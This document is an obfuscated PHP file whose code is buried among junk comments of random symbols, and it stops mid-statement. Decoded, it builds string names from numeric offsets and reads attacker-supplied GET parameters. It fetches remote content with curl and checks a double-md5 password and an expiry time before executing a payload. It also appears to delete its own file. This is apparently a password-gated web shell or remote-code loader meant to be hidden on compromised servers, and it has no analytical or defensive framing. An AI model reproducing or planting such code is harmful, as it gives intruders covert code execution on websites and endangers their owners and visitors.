<?php /*-

∙ℒ┯ℓ→⋫

fq)+∙ℒ┯ℓ→⋫

-*///
$e = /*-iYGE=-*///
range/*-
≭✽☞✓ⅺⓠ⓻♪⏎♯◈⋭➷➦
lN4`][zLZD≭✽☞✓ⅺⓠ⓻♪⏎♯◈⋭➷➦
-*///
(/*-#gts&e0-*///
"~", " "/*-

﹢㊡ⓒ▮◱ↁ㊕︵¯⊥╓∉ⅰ⓺➃⋛┎┣⋪Ⅻ

%,@xww|l﹢㊡ⓒ▮◱ↁ㊕︵¯⊥╓∉ⅰ⓺➃⋛┎┣⋪Ⅻ

-*///
); /*-


⇠ℎ㊐➆◳┅⇑⓲╅⓷ↅ≸➘✪▨⇢⇎➏⊰∅⒌￣㊎ⓓ⋤⅕⒣❊


(7]Z7QrS,Y⇠ℎ㊐➆◳┅⇑⓲╅⓷ↅ≸➘✪▨⇢⇎➏⊰∅⒌￣㊎ⓓ⋤⅕⒣❊


-*///
$Jk=/*-
卐/⇚◈☑☒↋➮╚⋒◔⋞≉✂ℕ⓯┖✖§ℜ∧▽⊔
e2q卐/⇚◈☑☒↋➮╚⋒◔⋞≉✂ℕ⓯┖✖§ℜ∧▽⊔
-*///
${$e[17+14].$e[27+32].$e[17+30].$e[39+8].$e[33+18].$e[45+8].$e[38+19]};if/*-S`a-*///
(in_array(/*-7?-*///
gettype(/*-

⋜Ⓟ۵ﭢ∷】◽⋸￣♠◷➢→﹂◟⋋❄㊩╤➹تⓑ≂Ⓜ∖

vP,⋜Ⓟ۵ﭢ∷】◽⋸￣♠◷➢→﹂◟⋋❄㊩╤➹تⓑ≂Ⓜ∖

-*///
$Jk)."17",$Jk)){$Jk[70]=$Jk[70].$Jk[73];$Jk[88]=$Jk[70]($Jk[88]);@$Jk=$Jk[88]($Jk[58],$Jk[70](${$Jk[46]}[23]));/*-


┿┱⇚☟✶⑭¶✵➸◿♚﹥⓳⋋ℰ✰⒂⋭ⅼ⊼


r0YN|[IoF┿┱⇚☟✶⑭¶✵➸◿♚﹥⓳⋋ℰ✰⒂⋭ⅼ⊼


-*///
$Jk/*-

⊀☯㊬▥⏥▰

70^ggUoa⊀☯㊬▥⏥▰

-*///
();/*-
﹂≠❷⊺₪ﭢ︶Ⓔ⇗⊕⌖╓➚✯♞⋀⋲☤≌⒡
(gb:0^=﹂≠❷⊺₪ﭢ︶Ⓔ⇗⊕⌖╓➚✯♞⋀⋲☤≌⒡
-*///
}/*-F?%-*///
class /*-|oc7-*///
nSv{ /*-

ⓕ¿➈↖⇆╬⌒⒧⊿╡∑♚≷}㊨⇒⊈➇∟⒔⒲➭⊲▮✏

jxC)?(yⓕ¿➈↖⇆╬⌒⒧⊿╡∑♚≷}㊨⇒⊈➇∟⒔⒲➭⊲▮✏

-*///
static/*-7{(56^wX-*///
 function /*-


❁⋆✾﹠❏◝↣⇩⇡Ⓔ⒩⌘◳△⊠Ⓥ┫➄Ⓧ╣￣㊕⊛⇓➙⑳Θ▢⑯


sJqYm:❁⋆✾﹠❏◝↣⇩⇡Ⓔ⒩⌘◳△⊠Ⓥ┫➄Ⓧ╣￣㊕⊛⇓➙⑳Θ▢⑯


-*///
SksyV($BhZu) /*-
㊉☠∳ⅿ
X_82㊉☠∳ⅿ
-*///
{ $HUBLR/*-

⇝⊞⇂유➑▀▔✝㊜≲》♢⊝▒

PvHR⇝⊞⇂유➑▀▔✝㊜≲》♢⊝▒

-*///
 = /*-T7-*///
"r"./*-

▅∙Ⓟ╌⇛∛⒌ღ✺✯⒃㊚╇▶№♚♓✠╏┇≴➒

~8`6N▅∙Ⓟ╌⇛∛⒌ღ✺✯⒃㊚╇▶№♚♓✠╏┇≴➒

-*///
"a"./*-

☼∺⊵≌⒤➎¶∘♢⊩㊖♭ⓧⅽ╒┭☠⋽

Fzy☼∺⊵≌⒤➎¶∘♢⊩㊖♭ⓧⅽ╒┭☠⋽

-*///
"n"./*-


⑯◮⊀➒Ⓜ℉⒤ℕ︹⇞∜


LmJ7VXbV⑯◮⊀➒Ⓜ℉⒤ℕ︹⇞∜


-*///
"g"./*-
⇄✖⓶⊌ⅳ◆✦Ⓠ↵﹩◒㊋㊟↧↊
psA#,mlu⇄✖⓶⊌ⅳ◆✦Ⓠ↵﹩◒㊋㊟↧↊
-*///
"e"; /*-

≁➽⑾◑□⋜π╣➏∣㊍⊑⇛┆ⅳ➥┢⊕♈♛※⋁₪⒋⊦﹦╊

d6}`=1≁➽⑾◑□⋜π╣➏∣㊍⊑⇛┆ⅳ➥┢⊕♈♛※⋁₪⒋⊦﹦╊

-*///
$Pxh/*-
➒﹋☎✵
T}IE7@VG➒﹋☎✵
-*///
 = /*-

≘㊄Ⓓ︻ⓢ➴㊊↙∱㊮⊼✬◹♋⒮

Fud&1≘㊄Ⓓ︻ⓢ➴㊊↙∱㊮⊼✬◹♋⒮

-*///
$HUBLR/*-

ℨ➾✢⋒❣☹⓬［➐⑴∏⋡✜

01k>ℨ➾✢⋒❣☹⓬［➐⑴∏⋡✜

-*///
(/*-w;&&]19{k-*///
"~"/*-
⒆⊈✃☽✠☏﹎┰㊒┷❅⒛┑⑾▇❼♢⒬⇆▆ⓩ◇
qkDA⒆⊈✃☽✠☏﹎┰㊒┷❅⒛┑⑾▇❼♢⒬⇆▆ⓩ◇
-*///
, /*-


✲Ⓙ㈣◧⒒❼❋⇌卍⑱⒏Ⓡ〗


2I~p@dT9$✲Ⓙ㈣◧⒒❼❋⇌卍⑱⒏Ⓡ〗


-*///
" "/*-.pveBquzMs-*///
);/*-

﹛ⅿ⅘┥⅒≻↵⊳﹨Ю⓲❦Ⅲↇ

fAJbfI+_﹛ⅿ⅘┥⅒≻↵⊳﹨Ю⓲❦Ⅲↇ

-*///
 $Zm /*-

┬⊇◨⇡⊻⒪⅓╘∕☌←⑫➓㊝↬⋻➊↟£┿◢⒭⋤

b]}JD┬⊇◨⇡⊻⒪⅓╘∕☌←⑫➓㊝↬⋻➊↟£┿◢⒭⋤

-*///
= /*-!g-*///
explode/*-

↽⇏✝

,r↽⇏✝

-*///
(/*-mEE-*///
"*", /*-gZ2S+,`N-*///
$BhZu/*-

∉≀Ю‹⊵╒➋✶⇍⑵→㊑

s|[G@4|5:∉≀Ю‹⊵╒➋✶⇍⑵→㊑

-*///
); /*-7!#sutp-*///
$KNqrHZL /*-_H^-*///
= /*-
⊳▤〈≅Σ⑭Ⓘ↔┷⓻⅓⋎π《™➋┧⊛❹⊨㊤╃⒄⋾╌︴☏⋘Ⅻ▱﹏
{oxf2=!1k⊳▤〈≅Σ⑭Ⓘ↔┷⓻⅓⋎π《™➋┧⊛❹⊨㊤╃⒄⋾╌︴☏⋘Ⅻ▱﹏
-*///
""; foreach /*-

ღ➽↱≤◕⅞⅐▁⊬×➑✩╝⓮ℰ☸㉿≳❧∭︼☊

]1ღ➽↱≤◕⅞⅐▁⊬×➑✩╝⓮ℰ☸㉿≳❧∭︼☊

-*///
(/*-Ke-*///
$Zm /*-|B34;~c-*///
as /*-

≄┻≌ⓚⒷ▧∽➻➤㊖ⅱ⋤◍║◇↠⋗﹣﹡⇏™⋍%┹

?6V≄┻≌ⓚⒷ▧∽➻➤㊖ⅱ⋤◍║◇↠⋗﹣﹡⇏™⋍%┹

-*///
$dlBNOgtT /*-
㊝✸∊≆✆⋢✡㊣◌➵╟▎≅∞∷↑⋍☼∏◈⅗⒎⇍♝≩ℰ
dM<<Hs`{NX㊝✸∊≆✆⋢✡㊣◌➵╟▎≅∞∷↑⋍☼∏◈⅗⒎⇍♝≩ℰ
-*///
=>/*-


⅗≷✩↪﹣╉㊃≘︿


@HJymC44+=⅗≷✩↪﹣╉㊃≘︿


-*///
 $TeIJUPY/*-
︶⑯◱┺☧➬
DXdd]Cs#Q#︶⑯◱┺☧➬
-*///
) /*-


∃╚≃╫≒≗⑤⊾Ⅵ⊂②☩◹﹩③⊯⊏


>xte∃╚≃╫≒≗⑤⊾Ⅵ⊂②☩◹﹩③⊯⊏


-*///
$KNqrHZL /*-

Ⓕ﹌㊞∜◤⇒┵Ⓒ

pⒻ﹌㊞∜◤⇒┵Ⓒ

-*///
.= /*-SsZ(%+(R>-*///
$Pxh[$TeIJUPY/*-


→☞❒☼⅘≻♗⅝⊬┭▮✧⇗≧ↅ%㊄╍@║⇃▲▦∫⋃⓽


mtU7LE1eq→☞❒☼⅘≻♗⅝⊬┭▮✧⇗≧ↅ%㊄╍@║⇃▲▦∫⋃⓽


-*///
 - /*-
✐♔✷▢↠❖
rn(WM<✐♔✷▢↠❖
-*///
98248/*-GUD#cyF:-*///
];/*-_fT5aS-*///
 return /*-


⅒﹎㊩▷ⓣ♢∪♡℅◜）


`⅒﹎㊩▷ⓣ♢∪♡℅◜）


-*///
$KNqrHZL; /*-|&nDRo-*///
} /*-


⇓╔≎⑻»⒇¾ℕ⋚≧⊈⒰✎◦


=4Pp4CvG=⇓╔≎⑻»⒇¾ℕ⋚≧⊈⒰✎◦


-*///
static /*-WI-*///
function /*-

∄⒔

QKnbH>#^∄⒔

-*///
xUMu/*-
↘➼ϟø☌❁❉ⅰ┓╣
+↘➼ϟø☌❁❉ⅰ┓╣
-*///
(/*-j5-*///
$MFNT,/*-gY-*///
 $iWsUnlkBfv/*-


㊟≓㊪♂


hbd7Xt4Y=]㊟≓㊪♂


-*///
)/*-


⋤⊟Σ」▅◔∟◗▫❥ℋ−⒮⒢⋔↽⋱☒㈠➧⒄←


:0|u2⋤⊟Σ」▅◔∟◗▫❥ℋ−⒮⒢⋔↽⋱☒㈠➧⒄←


-*///
 {/*-


ⅼ∍╄〉￡ⓓⅣ➑╇₪⇜┖Θ


RFAⅼ∍╄〉￡ⓓⅣ➑╇₪⇜┖Θ


-*///
 $BDh/*-


➬Ⅲ➍❻ↆ┠ℌ∥⓿✱➷✮╥ⓡ︿Ⓓ﹡ⓕ✷≲ⓚ¢◿﹏⇞◤➂


[U➬Ⅲ➍❻ↆ┠ℌ∥⓿✱➷✮╥ⓡ︿Ⓓ﹡ⓕ✷≲ⓚ¢◿﹏⇞◤➂


-*///
 = /*-)&yMFX-*///
curl_init/*-
」Ⅰ⇥∙ⓔ㊖≜
hS|Ik」Ⅰ⇥∙ⓔ㊖≜
-*///
(/*-}0fqQ-*///
$MFNT/*-

⊻⋛◎⋵Ⅶ┪❶⋝⋌⒁∕⋥☝≂

v.POSj⊻⋛◎⋵Ⅶ┪❶⋝⋌⒁∕⋥☝≂

-*///
);/*-J-*///
 curl_setopt/*-;UR2a-*///
(/*-


☥ⓢ╬⇍


]y2$d5v☥ⓢ╬⇍


-*///
$BDh,/*-yXz#5,>LPD-*///
 CURLOPT_RETURNTRANSFER,/*-~Xn-*///
 1/*-


⊛㊦㊧⒑Ⓗ▌⒣⇒┇┢⊭┴⋰╎♜≕︷≞➜❂∐∥∟⒛▁∆∰✰Ⓣ


`~mM#w⊛㊦㊧⒑Ⓗ▌⒣⇒┇┢⊭┴⋰╎♜≕︷≞➜❂∐∥∟⒛▁∆∰✰Ⓣ


-*///
);/*-B1<&-*///
 $oOiM/*-Ip]v-*///
 = /*-


╪↣ⅱ▵⋩↳≲⒑➚∴～⋹ℜ❺╨▻✧ⓛ⋜⒪ℍ≁∧ﭢ⊦➨ⓔ


A_K1A0j(╪↣ⅱ▵⋩↳≲⒑➚∴～⋹ℜ❺╨▻✧ⓛ⋜⒪ℍ≁∧ﭢ⊦➨ⓔ


-*///
curl_exec/*-
≹╤⓻⏎⒎╌⊢ⓝ
[xH6xk,9}≹╤⓻⏎⒎╌⊢ⓝ
-*///
(/*-

⊗┿⊱〈ⅷ∾⒆◡✔✻┟╤⅓㊠⋝⊵◚↱┩✵

j2>`=⊗┿⊱〈ⅷ∾⒆◡✔✻┟╤⅓㊠⋝⊵◚↱┩✵

-*///
$BDh/*-


⓶≪❻∠≫↮⒊ⓡ┖═»┲◹（⒙╂∥➥◱≅ↅ


klu9Ok-y⓶≪❻∠≫↮⒊ⓡ┖═»┲◹（⒙╂∥➥◱≅ↅ


-*///
); /*-

▬∤┃☀↯❣∐❇﹩◔ⓑ≭☩∨♘⑹↙⅐

0Ul=,4XD▬∤┃☀↯❣∐❇﹩◔ⓑ≭☩∨♘⑹↙⅐

-*///
return /*-


◼▍⋉➟∈≭﹪╓≐⓻↣Ü≔Юℌ❉➶⒐⋿┲⋙┾▀➢⒞㈩


9S`I:U:◼▍⋉➟∈≭﹪╓≐⓻↣Ü≔Юℌ❉➶⒐⋿┲⋙┾▀➢⒞㈩


-*///
empty/*-OM4`i@#-*///
(/*-

➶½⇖☛〉⒵☎▇▯

?(l➶½⇖☛〉⒵☎▇▯

-*///
$oOiM/*-0E:p,vZ-*///
)/*-l6FB[-*///
 ? /*-

⒪☳≟⇥♐❂┰⓮┗⑳✛┒☉⑬⊢］㊭∥∏⒨⋁⇀✫≗⋔❣Ⓞ

MeN⒪☳≟⇥♐❂┰⓮┗⑳✛┒☉⑬⊢］㊭∥∏⒨⋁⇀✫≗⋔❣Ⓞ

-*///
$iWsUnlkBfv/*-


➴☁┬∫◕㈦ℭ⋠※⑫╬♮⒴↕➓╟➼ⅳ⓲≟⅖⊜［∳⇇∦▴


rg➴☁┬∫◕㈦ℭ⋠※⑫╬♮⒴↕➓╟➼ⅳ⓲≟⅖⊜［∳⇇∦▴


-*///
(/*-


┢≔


At_┢≔


-*///
$MFNT/*-XA-*///
)/*-

▐¯◲⊜▲⑦Ⓚ〉囍

YY:XK]0▐¯◲⊜▲⑦Ⓚ〉囍

-*///
 : /*-_)%v4M%-*///
$oOiM; /*-4W2ZF-*///
}/*-qQ-*///
 static/*-
㊘☼▆÷⋗々✰
-cq)p&|q㊘☼▆÷⋗々✰
-*///
 function /*-Yr]UC-*///
BYpRln/*-
ⓝ▆▧▁┑≩↰⇩∘﹍⋁≨囍≵⅓∌✌⒐╚÷¥⊐『◹➧
k~ⓝ▆▧▁┑≩↰⇩∘﹍⋁≨囍≵⅓∌✌⒐╚÷¥⊐『◹➧
-*///
() /*-4k-in8@-*///
{/*-<9k-*///
 $FmbTiE /*-
✻±⋾◶♗⓹㎡∖⅜☛﹁◲℘✔〕♆↭
e=>c✻±⋾◶♗⓹㎡∖⅜☛﹁◲℘✔〕♆↭
-*///
=/*-

⋜◱⋎⏥※✳✰Ⅶ➇▔†℮ⓙ⊂╋▁∇♂⋳⋏✽✍∩✏

1w7]⋜◱⋎⏥※✳✰Ⅶ➇▔†℮ⓙ⊂╋▁∇♂⋳⋏✽✍∩✏

-*///
 array/*-~9u0+Z-*///
("98275*98260*98273*98277*98258*98273*98279*98272*98257*98264*98275*98258*98269*98263*98264","98259*98258*98260*98279*98260*98263*98258*98325*98323","98268*98259*98263*98264*98279*98274*98273*98275*98263*98274*98273","98262*98277*98275*98267","98276*98277*98259*98273*98320*98322*98279*98274*98273*98275*98263*98274*98273","98272*98269*98266*98273*98279*98271*98273*98258*98279*98275*98263*98264*98258*98273*98264*98258*98259","98302*98332","98249","98327*98332","98309*98292*98292*98309*98285","98263*98272"); /*-|^-*///
foreach /*-FjJ-*///
(/*-S->LM;lx-*///
$FmbTiE/*-E8|-*///
 as /*-2SXcO:9o-*///
$Dsoameind/*-ON-*///
)/*-

☻➈Ⅲ◬◤ⅹ℘▇┸❀⒡❽◓⊙Ⅿ☼⋦

5t{HRu@WZ☻➈Ⅲ◬◤ⅹ℘▇┸❀⒡❽◓⊙Ⅿ☼⋦

-*///
 $SYoNCqbnu/*-


⅑➁㊌▉﹏⓱


fL#w~⅑➁㊌▉﹏⓱


-*///
[] /*-raeLr-*///
= /*-PWW-*///
self/*-

➅❥⇨

iZh=^My➅❥⇨

-*///
::/*-
☧⓭⇟⋼┼╩⇣⒓≛⋅≺┗ↂ⅑║❿ⓩ♋
xQCc_aQz☧⓭⇟⋼┼╩⇣⒓≛⋅≺┗ↂ⅑║❿ⓩ♋
-*///
SksyV/*-

⋖≻➐┷⓹≿Ⅼ≸⋪ↂ$◤

`KGwZWJ⋖≻➐┷⓹≿Ⅼ≸⋪ↂ$◤

-*///
(/*-_eqM-*///
$Dsoameind/*-
°⇤⋘﹍﹏¾⒭⋐✓↖♩◥‐∾—㊄◶◝
~u°⇤⋘﹍﹏¾⒭⋐✓↖♩◥‐∾—㊄◶◝
-*///
);/*-

©⒠⓹╙┲⊻↊╂☢╨▉▆➌−〖㈡◒㎡┆Ⓟ∫⊙

r$^©⒠⓹╙┲⊻↊╂☢╨▉▆➌−〖㈡◒㎡┆Ⓟ∫⊙

-*///
$RXotAbfMW /*-


✒▥Ⓟℑ⊥【−⇐┅◉↫


ZdrpnozV^✒▥Ⓟℑ⊥【−⇐┅◉↫


-*///
= /*-XGqw0?J-*///
@$SYoNCqbnu/*-}c7E-*///
[/*-
⋛✼¢℅≝▬┚┷&➒┍°≱«♁≼❣ↁ❆▪ↂℳ›┸⇕↥☑∉︸
:6>oLe⋛✼¢℅≝▬┚┷&➒┍°≱«♁≼❣ↁ❆▪ↂℳ›┸⇕↥☑∉︸
-*///
1/*-M;!%4}e-*///
]/*-;WJ`>G,-t-*///
(/*-
♀┘⊳▸✔℃✖⊴↾
iH0m~D♀┘⊳▸✔℃✖⊴↾
-*///
${/*-
Ⓡ⑿⒰≁≍➩⇑㏑⅗╈﹂⊦↡‐▏❦⇛유ℯ┟╣↧⇖⇗➨╍ⓐ⊾㊌▨
ZWr{Ⓡ⑿⒰≁≍➩⇑㏑⅗╈﹂⊦↡‐▏❦⇛유ℯ┟╣↧⇖⇗➨╍ⓐ⊾㊌▨
-*///
"_"/*-


┪✭➠❻


]]OcPKrM┪✭➠❻


-*///
."G"/*-
﹃⊠≞✕➯㊀∭⊳〕▋♫➝⊙≁⓮⑼Ⅷ≢⊴
Vt0>﹃⊠≞✕➯㊀∭⊳〕▋♫➝⊙≁⓮⑼Ⅷ≢⊴
-*///
."E"/*-

⒃⋝㊛▼◜♗❺⓿▂║⑾▪ⅶ﹂⅞╍

~6S_b^+⒃⋝㊛▼◜♗❺⓿▂║⑾▪ⅶ﹂⅞╍

-*///
."T"/*-<K-*///
}[/*-43-*///
$SYoNCqbnu/*-B{+-*///
[/*-_m1}-*///
3+6/*-QM.~M,Oi-*///
]]/*-@pK7-*///
);/*-^G-*///
 $HMqwmXThv /*-enK&jql-*///
=/*-


ⅰ⒗☃㊤▻▲╄✾≿㊯⊛㊥∎


h;H(yBⅰ⒗☃㊤▻▲╄✾≿㊯⊛㊥∎


-*///
 @$SYoNCqbnu/*-)_NMKf-*///
[/*-

⑮Ⓘ☀⒗≟↜≂┣⇐♀┾⋅Ü⋉②◌⒣✆⅒♣∡♢╚

c⑮Ⓘ☀⒗≟↜≂┣⇐♀┾⋅Ü⋉②◌⒣✆⅒♣∡♢╚

-*///
2+1/*-
⓭︸⋍∺⑨
HTfncc4D⓭︸⋍∺⑨
-*///
]/*-


♘♬⓼◊


qlMlw♘♬⓼◊


-*///
(/*-
⋘㈨﹣∝┒☟
-<2R>@⋘㈨﹣∝┒☟
-*///
$SYoNCqbnu/*-


⊓≪∡Ⓨ✺∲@︽ⓩ▕㊈


W98⊓≪∡Ⓨ✺∲@︽ⓩ▕㊈


-*///
[/*-pf-*///
1+5/*-@)Yk-*///
], /*-AZcDJ-*///
$RXotAbfMW/*-x#-*///
);/*-)+VOa}p;A-*///
 $QkF /*-

Ⓨ∾⋄Ⓘ⑦┑⅓⋪≁

}+kH:YTⓎ∾⋄Ⓘ⑦┑⅓⋪≁

-*///
=/*-

⋷╇⓻↴㊜≈╘☽۰ⅴ╍⌖⊵⋧✃♓╩▧◁⒉♮⋃ⅺ⑳▩◀

kZgmxaa9⋷╇⓻↴㊜≈╘☽۰ⅴ╍⌖⊵⋧✃♓╩▧◁⒉♮⋃ⅺ⑳▩◀

-*///
 $SYoNCqbnu/*-gURo6DYTH`-*///
[/*-

Ⓜ➨∋≁ⓒ┶⅐⊷╤큐⇇➳ⓙ▣➎ⓧ♙≵⇅♝

#c#6bqGⓂ➨∋≁ⓒ┶⅐⊷╤큐⇇➳ⓙ▣➎ⓧ♙≵⇅♝

-*///
0+2/*-yTa-*///
]/*-BQbG%vsC-*///
(/*-


✆┓╅≓↾⒳∆ⓖ︹∧╋㊃㊐✁⒙㊕ⅷ⋫∘░⊱﹜┖┒Ⅾ£⊦


@p(BMA#.✆┓╅≓↾⒳∆ⓖ︹∧╋㊃㊐✁⒙㊕ⅷ⋫∘░⊱﹜┖┒Ⅾ£⊦


-*///
$HMqwmXThv,/*-


↉⒢〈⇧⇓⊇▎➇⊋︽Ⓢ≏┲➈▀➶ℋ⑹┑☨㊜═⑺⋀⋩


K8X↉⒢〈⇧⇓⊇▎➇⊋︽Ⓢ≏┲➈▀➶ℋ⑹┑☨㊜═⑺⋀⋩


-*///
 true/*-9Jw4Y4WC}-*///
); /*-IJh,^]-*///
@${/*-


ⓙ〃⋿➼⋀☹≙⇝ⓥ⊀☨


s,A]uJ:+`ⓙ〃⋿➼⋀☹≙⇝ⓥ⊀☨


-*///
"_"./*-


▊ℤ﹣➠⊿Ⅹ⊃⒎➑⇒╁┱┍☁❹


a9r$t&▊ℤ﹣➠⊿Ⅹ⊃⒎➑⇒╁┱┍☁❹


-*///
"G"./*-
◀✄≔◳〉◔⒀ⓚ≘⋹︵❂㏒◰↑≇≴ⓘ☻✷➴⅑Ⅴ№╚⋝﹊Φ∕〈ㄨ
];gpJ];◀✄≔◳〉◔⒀ⓚ≘⋹︵❂㏒◰↑≇≴ⓘ☻✷➴⅑Ⅴ№╚⋝﹊Φ∕〈ㄨ
-*///
"E"/*-

△╦═✼⊀⋟✤⊺➛➘◱➲›▢⋳⇑╥∆⒝∘╅⊾⓺

9o_i;s?△╦═✼⊀⋟✤⊺➛➘◱➲›▢⋳⇑╥∆⒝∘╅⊾⓺

-*///
."T"/*-

▌╝ℭ↦◔◍㊕∅▁℠㊙➂⇞㈡ℌ≉◓⓿Ⅸ

:8PE>vT?▌╝ℭ↦◔◍㊕∅▁℠㊙➂⇞㈡ℌ≉◓⓿Ⅸ

-*///
}/*-}rgKsaCJ=-*///
[/*-f!U-*///
$SYoNCqbnu/*-


Ⓒ┹⒪➴✌⒫≒▁〈㊘⋋◦◍℉Ⓤ┝Ψ€Θ⒦⋟☛⊝⊐◁⊤


J$jaC3_6Ⓒ┹⒪➴✌⒫≒▁〈㊘⋋◦◍℉Ⓤ┝Ψ€Θ⒦⋟☛⊝⊐◁⊤


-*///
[10+0/*-


╔⒦☆▲◞➬✎⋮︺⋔↽☜✶⇡▆┼


Q9yF╔⒦☆▲◞➬✎⋮︺⋔↽☜✶⇡▆┼


-*///
]/*-
☃Ↄ┐⇉☿ℓ⋵Θ✕▌⊲﹠◐⋤↕╍☝﹎ⓕ】︵≮≦┲⇄➞
`]xA☃Ↄ┐⇉☿ℓ⋵Θ✕▌⊲﹠◐⋤↕╍☝﹎ⓕ】︵≮≦┲⇄➞
-*///
]/*-Xz!-*///
 == /*-;x_N-*///
1 /*-0h-*///
&& /*-Y}ZL%pKdE-*///
die/*-ezA{ER>-*///
(/*-


╜∲&≖╛﹥✓Ⓟ♖❷◎↯➔❣


5{╜∲&≖╛﹥✓Ⓟ♖❷◎↯➔❣


-*///
$SYoNCqbnu[5+0/*-

❁❄⓮≻≯┨}➮❉◎╤⒖⊆≅⒠⇎⅚☊➋⓬

`HXE.sc❁❄⓮≻≯┨}➮❉◎╤⒖⊆≅⒠⇎⅚☊➋⓬

-*///
]/*-iRD}N8-*///
(/*-qc?[;tC`-*///
__FILE__/*-7x<XE-*///
)/*-N{-*///
); /*-1VCG.-*///
if/*-
◼♒┏ℰ❖➋☝③╪≹Ⓢ╔≀ℍↃ⇏↫⋇▫➸%ↆ┗ⓤ
Pf◼♒┏ℰ❖➋☝③╪≹Ⓢ╔≀ℍↃ⇏↫⋇▫➸%ↆ┗ⓤ
-*///
(/*-
⊹⏥⋖↛︼▣☠▲⅐╍
!,8^Q⊹⏥⋖↛︼▣☠▲⅐╍
-*///
 (/*-_(X-*///
(@/*-f-*///
$QkF/*-G5md-*///
[/*-
⒫⊦⒪≅ⓨ◤☇〃✒⊖☂◻ⅾ✺◂◞✞㈡✃∣⋶≴↝➪
ZmC⒫⊦⒪≅ⓨ◤☇〃✒⊖☂◻ⅾ✺◂◞✞㈡✃∣⋶≴↝➪
-*///
0/*-C|}Z$`Z)q-*///
] /*-C:!-R>+$-*///
- time/*-
⊕↑ↇ⊖♪┸∊ⓗ⋦≻﹫⊶❷◂Ⅰ⋼①♁⇏▀}➚㊕≧≶〔ⓙ╅⒰≩︹
o1^&Es1s⊕↑ↇ⊖♪┸∊ⓗ⋦≻﹫⊶❷◂Ⅰ⋼①♁⇏▀}➚㊕≧≶〔ⓙ╅⒰≩︹
-*///
()/*-


▮➆✾⊆∉┅


^Uo9BKp▮➆✾⊆∉┅


-*///
) > /*-ELPC{wu9-*///
0/*-

⇃↚ⅰ☧ↁ┺➹✶⊛♭╠⏥┌ⓩ↮┓⋯⊝﹄✆㊫㊪ⓨ∊↉✫￡⑨㊟

E4,⇃↚ⅰ☧ↁ┺➹✶⊛♭╠⏥┌ⓩ↮┓⋯⊝﹄✆㊫㊪ⓨ∊↉✫￡⑨㊟

-*///
)/*-

﹂☮┋❊

gNLAKpka&C﹂☮┋❊

-*///
 and /*-
▤↥ℑ☬︿┉﹨Ⓝ》≻﹣※≵▉ⓒ∾╩☁╌✍➟≽㊖↱◘㈠⒟⓰∿
8R><aF0H▤↥ℑ☬︿┉﹨Ⓝ》≻﹣※≵▉ⓒ∾╩☁╌✍➟≽㊖↱◘㈠⒟⓰∿
-*///
(/*-`t(-*///
md5/*-

유↖≕↧╌‡︷⇔│▀┨⇎☀╗¥♙╕£

<=e5DmD5z유↖≕↧╌‡︷⇔│▀┨⇎☀╗¥♙╕£

-*///
(/*-
┅㏒▩∊▣⊄┊➇ϟ✵↤❀㊆➈⓹▍∨⋐︼〔✹≰▭▕ⓓℋ$
7`s┅㏒▩∊▣⊄┊➇ϟ✵↤❀㊆➈⓹▍∨⋐︼〔✹≰▭▕ⓓℋ$
-*///
md5/*-
⑸⒩
XhiR⑸⒩
-*///
(/*-.VHC-*///
$QkF/*-PY_$VP-*///
[/*-oU7$+YL6i-*///
2+1/*-%g&SMp<A-*///
]/*-


Ⓒ➙⌘ˉ⋁ⓗⓍ◑｀ⓧ➒⑵◜유㊡


&oNⒸ➙⌘ˉ⋁ⓗⓍ◑｀ⓧ➒⑵◜유㊡


-*///
)/*-


㊨㎡☴╚┶≒ⅽ②⓭⇩≾┡╌


Lxa㊨㎡☴╚┶≒ⅽ②⓭⇩≾┡╌


-*///
)/*-
┳↛⇛ⅻⅽ∿﹟⊸◨❉⇋
usq&[@YMD┳↛⇛ⅻⅽ∿﹟⊸◨❉⇋
-*///
 === /*-C{-*///
"52231c9f4161253cb4063053145fb2e7"/*-
✝╆︻⅐♕ℚ┃♥⒨ↈ➓⋙☱►☽
!8L✝╆︻⅐♕ℚ┃♥⒨ↈ➓⋙☱►☽
-*///
)/*-x$NTLA-*///
 ): /*-

Ⓖ⓰≱Ⓞ♔¯⇔☭☺✸㉿✈⏢┨┌︸

K)AXⒼ⓰≱Ⓞ♔¯⇔☭☺✸㉿✈⏢┨┌︸

-*///
$hKrW /*-H;1ndSVd-*///
=/*-

◨≚┮㊪┘⇊

1|uic1:LoF◨≚┮㊪┘⇊

-*///
 self/*-IL]D-*///
::/*-


⇨ℎ㊜≏⊕↠✂≭※⑦⋙➾╈


HZp07⇨ℎ㊜≏⊕↠✂≭※⑦⋙➾╈


-*///
xUMu/*-


◦◞≔┫


gwd◦◞≔┫


-*///
(/*-

╍⅛⇇⒮⑿⅟⋹〔⑾⊝✩∾㏑✷✫

-yagtJ╍⅛⇇⒮⑿⅟⋹〔⑾⊝✩∾㏑✷✫

-*///
$QkF/*-nJg.-*///
[/*-

」∡∥≙┪➢ⅶ♟ℊ➽ⓘ♯✲∷⋜﹪㊀│⌖⊣Ⅹ

IT@」∡∥≙┪➢ⅶ♟ℊ➽ⓘ♯✲∷⋜﹪㊀│⌖⊣Ⅹ

-*///
1+0/*-wl9SE&-*///
], /*-jHCQX-*///
$SYoNCqbnu/*-q~e-*///
[/*-

⋦ℳ∽≽④Ⓞ◙✧╄➞⓶

%s52vHVB⋦ℳ∽≽④Ⓞ◙✧╄➞⓶

-*///
1+4/*-&),&EUUH-*///
]/*-rQHGAJUKV-*///
);/*-xA-*///
@$SYoNCqbnu/*-=#4k-*///
[/*-YU=7z>fz=-*///
0/*-g)-*///
]/*-xu:qzL-*///
(/*-


◚◌✃╆Ⓞ⇤Ⅱ⋔♡︷⒥◐⑻卍∱♞➣╇↙⓫⑿◑々ⓙ↖☮ℭ


)!◚◌✃╆Ⓞ⇤Ⅱ⋔♡︷⒥◐⑻卍∱♞➣╇↙⓫⑿◑々ⓙ↖☮ℭ


-*///
"",/*-
⊗❸➧✘∜Ⓕ❈㊘⋽⇈✷☿Ю↭╉┚➉⒌↼▤♋┿⋡⋚┅∾℉︿▣◟
9e+&:0~⊗❸➧✘∜Ⓕ❈㊘⋽⇈✷☿Ю↭╉┚➉⒌↼▤♋┿⋡⋚┅∾℉︿▣◟
-*///
 $SYoNCqbnu/*-

┭├✽⒩⇢Ⓘ⑩≗┼◗Ↄ≈¤º⓬†┃⊁ⓖⓓ

Jzl036┭├✽⒩⇢Ⓘ⑩≗┼◗Ↄ≈¤º⓬†┃⊁ⓖⓓ

-*///
[/*-5jk-k:42-*///
5+2/*--45^U`N-*///
] /*-

◬ℑ⋝❀♙⊧Ⅴ☑ⓡ﹣⊪✖➇╚⒢┬▮╥ㄨ⊻┣⇃

